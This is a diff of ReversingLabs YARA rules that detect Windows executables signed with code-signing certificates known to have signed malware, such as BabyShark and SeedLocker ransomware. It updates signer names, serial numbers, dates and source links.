-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "05b2f297454e7080591b85991b224193eb89fc5074eb3c2e484ceadad2de4cb7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2952-L2968"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0f46fcfc8ee06756646899450daa254d3e5261bdc5c2339f20d01971608fff7b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -12991,21 +37656,21 @@ rule REVERSINGLABS_Cert_Blocklist_E55Be88Ddbd93C423220468D430905Dd : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VALVE ACTUATION LTD" and ( pe.signatures [ i ] . serial == "00:e5:5b:e8:8d:db:d9:3c:42:32:20:46:8d:43:09:05:dd" or pe.signatures [ i ] . serial == "e5:5b:e8:8d:db:d9:3c:42:32:20:46:8d:43:09:05:dd" ) and 1637712000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MIKL LIMITED" and pe.signatures [ i ] . serial == "3d:25:80:e8:95:26:f7:85:2b:57:06:54:ef:d9:a8:bf" and 1529888400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_06Bcb74291D96096577Bdb1E165Dce85 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Fffe432A53Ff03B9223F88Be1B83D9D : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing BabyShark malware."
 		author = "ReversingLabs"
-		id = "da483b60-d400-54ef-84e0-ea00b299b466"
+		id = "25a4c68b-5774-51a2-9aba-1326c85a5251"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10070-L10086"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "00b7ff8f3cbc04c48c71433c384d7a7884b856f261850e33ea4413a12cf5a1b5"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2970-L2986"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e7dbe6b95877f9473661ccf26fa6e5142147609adfe0a9bb8b493875325710af"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13015,21 +37680,21 @@ rule REVERSINGLABS_Cert_Blocklist_06Bcb74291D96096577Bdb1E165Dce85 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Revo Security SRL" and pe.signatures [ i ] . serial == "06:bc:b7:42:91:d9:60:96:57:7b:db:1e:16:5d:ce:85" and 1637971201 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EGIS Co., Ltd." and pe.signatures [ i ] . serial == "0f:ff:e4:32:a5:3f:f0:3b:92:23:f8:8b:e1:b8:3d:9d" and 1498524050 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C8442A8185082Ef1Ed7Dc3Fff2176Aa7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_832E161Aea5206D815F973E5A1Feb3E7 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing SeedLocker ransomware."
 		author = "ReversingLabs"
-		id = "2a56ff80-584b-5b8b-80ae-e763339cd17a"
+		id = "ecaa250b-d4ac-5cc9-9e5e-5d6f45db18ad"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10088-L10106"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "74b1b48f0179187ea7bb8ef4663bf13da47f5c6405ecc5589706184564c05727"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L2988-L3006"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "da908de031c78aa012809988e44dea564d32b88b65a2010925c1af85d578a68a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13039,21 +37704,21 @@ rule REVERSINGLABS_Cert_Blocklist_C8442A8185082Ef1Ed7Dc3Fff2176Aa7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ambidekstr LLC" and ( pe.signatures [ i ] . serial == "00:c8:44:2a:81:85:08:2e:f1:ed:7d:c3:ff:f2:17:6a:a7" or pe.signatures [ i ] . serial == "c8:44:2a:81:85:08:2e:f1:ed:7d:c3:ff:f2:17:6a:a7" ) and 1616976000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Project NSRM Ltd" and ( pe.signatures [ i ] . serial == "00:83:2e:16:1a:ea:52:06:d8:15:f9:73:e5:a1:fe:b3:e7" or pe.signatures [ i ] . serial == "83:2e:16:1a:ea:52:06:d8:15:f9:73:e5:a1:fe:b3:e7" ) and 1549830060 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0406C4A1521A38C8D0C4Aa214388E4Dc : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_09Aecea45Bfd40Ce7D62D7D711916D7D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9019330e-5ab5-5d37-85a1-0e882dbd68ce"
+		id = "421425b1-13ad-5d80-b044-8bd43c60b3ff"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10108-L10124"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f6780751ae553771eb57201a8672847a24512e6279b6a4fd843d8ee2f326860a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3008-L3024"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d1c6bfb10a244ba866c8aabdff6055388afa8096fd4bd77bb21f781794333e9b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13063,21 +37728,21 @@ rule REVERSINGLABS_Cert_Blocklist_0406C4A1521A38C8D0C4Aa214388E4Dc : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Venezia Design SRL" and pe.signatures [ i ] . serial == "04:06:c4:a1:52:1a:38:c8:d0:c4:aa:21:43:88:e4:dc" and 1641859201 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALINA LTD" and pe.signatures [ i ] . serial == "09:ae:ce:a4:5b:fd:40:ce:7d:62:d7:d7:11:91:6d:7d" and 1551052800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_12705Fb66Bc22C68372A1C4E5Fa662E2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4Ff4Eda5Fa641E70162713426401F438 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "78f9fdf0-d8c6-5316-8053-42f77adf95d1"
+		id = "3e34aa1b-a4b1-593d-bd93-0f5913ab96b9"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10126-L10142"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f10316a26e2d34400b7c2e403eab18ab6c1cc94b35f0ac8a3f490d101d29dc8d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3026-L3042"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "58f5e163d9807520497ba55e42c048020f6b7653ed71f3954e7ffb490f4de0e4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13087,21 +37752,21 @@ rule REVERSINGLABS_Cert_Blocklist_12705Fb66Bc22C68372A1C4E5Fa662E2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APRIL BROTHERS LTD" and pe.signatures [ i ] . serial == "12:70:5f:b6:6b:c2:2c:68:37:2a:1c:4e:5f:a6:62:e2" and 1642464000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DUHANEY LIMITED" and pe.signatures [ i ] . serial == "4f:f4:ed:a5:fa:64:1e:70:16:27:13:42:64:01:f4:38" and 1555349604 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3B0914E2982Be8980Aa23F49848555E5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_067Dffc5E3026Eb4C62971C98Ac8A900 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "88ca65c4-ba0d-5676-979b-4fac737d4f21"
+		id = "9b9771bb-c2a4-5a6e-8fdb-b3e98f62f9b1"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10144-L10160"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ea7d9fa7817751fef775765b54be5dd4d00c15ca50ac10fb40fb46cc3634c7b0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3044-L3060"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2b7c4cded14afd8ba3feabb6debaa1317917b811b44e22aa8a0b3ea00d689141"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13111,21 +37776,21 @@ rule REVERSINGLABS_Cert_Blocklist_3B0914E2982Be8980Aa23F49848555E5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Office Rat s.r.o." and pe.signatures [ i ] . serial == "3b:09:14:e2:98:2b:e8:98:0a:a2:3f:49:84:85:55:e5" and 1643155200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DVERI FADO, TOV" and pe.signatures [ i ] . serial == "06:7d:ff:c5:e3:02:6e:b4:c6:29:71:c9:8a:c8:a9:00" and 1552176000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_029Bf7E1Cb09Fe277564Bd27C267De5A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B1Da219688E51Fd0Bfac2C891D56Cbb8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1e66d13c-3345-592c-9bf8-b8a566c8b9e6"
+		id = "245c582a-b168-53ce-9a3c-b291ae5bc2a0"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10162-L10178"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3f64372d11d61c669580d90cdf2201e7f2904fb3d73d27be2ff1559c9c37614a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3062-L3080"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "03549214940a8689213bd2eb891da1c1991627c81c8b7f26860141c397409d46"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13135,21 +37800,21 @@ rule REVERSINGLABS_Cert_Blocklist_029Bf7E1Cb09Fe277564Bd27C267De5A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAMOYAJ LIMITED" and pe.signatures [ i ] . serial == "02:9b:f7:e1:cb:09:fe:27:75:64:bd:27:c2:67:de:5a" and 1637712001 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FIRNEEZ EUROPE LIMITED" and ( pe.signatures [ i ] . serial == "00:b1:da:21:96:88:e5:1f:d0:bf:ac:2c:89:1d:56:cb:b8" or pe.signatures [ i ] . serial == "b1:da:21:96:88:e5:1f:d0:bf:ac:2c:89:1d:56:cb:b8" ) and 1542931200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D3Aee8Abb9948844A3Ac1C04Cc7E6Bdf : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7289B0F9Bd641E3E352Dc3183F8De6Be : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6da50886-7f15-5565-9a1a-f6fb25a729ac"
+		id = "dc8a745f-7150-57b7-9ddc-e5a1721d8c02"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10180-L10198"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3f3f1d5c871d2b73627d4281ac5bcd08799fb47f94155e82795d97c87de35e40"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3082-L3098"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "42b068e85b3aff5e6dd5ec4979f546dc5338ebf8719d86c0641ffb8353959af9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13159,21 +37824,21 @@ rule REVERSINGLABS_Cert_Blocklist_D3Aee8Abb9948844A3Ac1C04Cc7E6Bdf : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HOUSE 9A s.r.o" and ( pe.signatures [ i ] . serial == "00:d3:ae:e8:ab:b9:94:88:44:a3:ac:1c:04:cc:7e:6b:df" or pe.signatures [ i ] . serial == "d3:ae:e8:ab:b9:94:88:44:a3:ac:1c:04:cc:7e:6b:df" ) and 1640822400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ICE ACTIVATION LIMITED" and pe.signatures [ i ] . serial == "72:89:b0:f9:bd:64:1e:3e:35:2d:c3:18:3f:8d:e6:be" and 1557933274 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_734819463C1195Bd6E135Ce4D5Bf49Bc : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Fd7B7A8678A67181A54Bc7499Eba44Da : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f7dd21fa-1501-50b2-bd9c-c33cfd932a6b"
+		id = "d6456cb6-e950-54be-a7f4-5c1d622c6aab"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10200-L10216"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a63c05cca23b61ba6eabda2b60c617b966a2669fd3a0da30354792e5c1ae2140"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3100-L3118"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f1e26ea26890043be2c8b9c35ba2e6758b60fe173f00bf4c77cc5289ce0d5600"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13183,21 +37848,21 @@ rule REVERSINGLABS_Cert_Blocklist_734819463C1195Bd6E135Ce4D5Bf49Bc : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "videoalarm s. r. o." and pe.signatures [ i ] . serial == "73:48:19:46:3c:11:95:bd:6e:13:5c:e4:d5:bf:49:bc" and 1637884800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IMRAN IT SERVICES LTD" and ( pe.signatures [ i ] . serial == "00:fd:7b:7a:86:78:a6:71:81:a5:4b:c7:49:9e:ba:44:da" or pe.signatures [ i ] . serial == "fd:7b:7a:86:78:a6:71:81:a5:4b:c7:49:9e:ba:44:da" ) and 1548028800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Db95B22362D46A73C39E0Ac924883C5B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ebbdd6Cdeda40Ca64513280Ecd625C54 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "527b7963-340e-5d8f-b7e1-1269c0073ec9"
+		id = "2cf769dc-5108-5f18-a51e-e152180a2b66"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10218-L10236"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "895983bcb7f3a0c5ce54504f4a2ff8d652137434b8951380d756de6556d0844e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3120-L3138"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1d419f2fe2a9bf744bdde48adc50e0bc48746f1576f96570385a2a1c9ba92d21"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13207,21 +37872,21 @@ rule REVERSINGLABS_Cert_Blocklist_Db95B22362D46A73C39E0Ac924883C5B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPSLTD PLYMOUTH LTD" and ( pe.signatures [ i ] . serial == "00:db:95:b2:23:62:d4:6a:73:c3:9e:0a:c9:24:88:3c:5b" or pe.signatures [ i ] . serial == "db:95:b2:23:62:d4:6a:73:c3:9e:0a:c9:24:88:3c:5b" ) and 1621296000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IT PUT LIMITED" and ( pe.signatures [ i ] . serial == "00:eb:bd:d6:cd:ed:a4:0c:a6:45:13:28:0e:cd:62:5c:54" or pe.signatures [ i ] . serial == "eb:bd:d6:cd:ed:a4:0c:a6:45:13:28:0e:cd:62:5c:54" ) and 1549238400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0C48732873Ac8Ccebaf8F0E1E8329Cec : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_61Da676C1Dcfcf188276E2C70D68082E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b531341a-e8ac-5b56-a202-3c072f5d2ce0"
+		id = "d974b740-38fa-564d-b4c6-8955568a4e77"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10238-L10254"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7c9476a4119e013c8bb3c14b607090d592feaa5f2fc0f78d810555681d4a3733"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3140-L3156"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4f8af4a5c9812e6559218e387e32bc02cb0adcd40d9d4963fefc929f6101ae9a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13231,21 +37896,21 @@ rule REVERSINGLABS_Cert_Blocklist_0C48732873Ac8Ccebaf8F0E1E8329Cec : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hermetica Digital Ltd" and pe.signatures [ i ] . serial == "0c:48:73:28:73:ac:8c:ce:ba:f8:f0:e1:e8:32:9c:ec" and 1618272000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "P2N ONLINE LTD" and pe.signatures [ i ] . serial == "61:da:67:6c:1d:cf:cf:18:82:76:e2:c7:0d:68:08:2e" and 1552723954 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C51F4Cf4D82Bc920421E1Ad93E39D490 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_767436921B2698Bd18400A24B01341B6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "727aba82-c908-51a6-9f1f-7fd8df424d8c"
+		id = "3e3b2b75-9416-5c4f-ad47-88f92039f532"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10256-L10274"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "cef717e7fe3eb0fb958d405caaf98fa51b22b150ccbf1286d3b4634e9df81ade"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3158-L3174"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "759bbbc5929463ad68d5dcd28b30401b9ff680f522172ed8d5d7dd3772e07587"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13255,21 +37920,21 @@ rule REVERSINGLABS_Cert_Blocklist_C51F4Cf4D82Bc920421E1Ad93E39D490 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CUT AHEAD LTD" and ( pe.signatures [ i ] . serial == "00:c5:1f:4c:f4:d8:2b:c9:20:42:1e:1a:d9:3e:39:d4:90" or pe.signatures [ i ] . serial == "c5:1f:4c:f4:d8:2b:c9:20:42:1e:1a:d9:3e:39:d4:90" ) and 1644624000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REBROSE LEISURE LIMITED" and pe.signatures [ i ] . serial == "76:74:36:92:1b:26:98:bd:18:40:0a:24:b0:13:41:b6" and 1556284480 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C96086F1894E6420D2B4Bdeea834C4D7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3E795531B3265510F935187Eca59920A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1268461b-676c-59b8-80c1-c54dbe1a265f"
+		id = "953434f4-cc19-5a0a-923b-4deaadacef00"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10276-L10294"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "949bbd41ad4c83a05c1f004786cd296e2af80a3a559955ec90a4675cdfa04258"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3176-L3192"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d597e88314f9f20283b40058dd74167d0d72f7518277a57f26c15e44b670b386"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13279,21 +37944,21 @@ rule REVERSINGLABS_Cert_Blocklist_C96086F1894E6420D2B4Bdeea834C4D7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE FAITH SP Z O O" and ( pe.signatures [ i ] . serial == "00:c9:60:86:f1:89:4e:64:20:d2:b4:bd:ee:a8:34:c4:d7" or pe.signatures [ i ] . serial == "c9:60:86:f1:89:4e:64:20:d2:b4:bd:ee:a8:34:c4:d7" ) and 1644969600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "sasha catering ltd" and pe.signatures [ i ] . serial == "3e:79:55:31:b3:26:55:10:f9:35:18:7e:ca:59:92:0a" and 1557243644 <= pe.signatures [ i ] . not_after )
 }
 
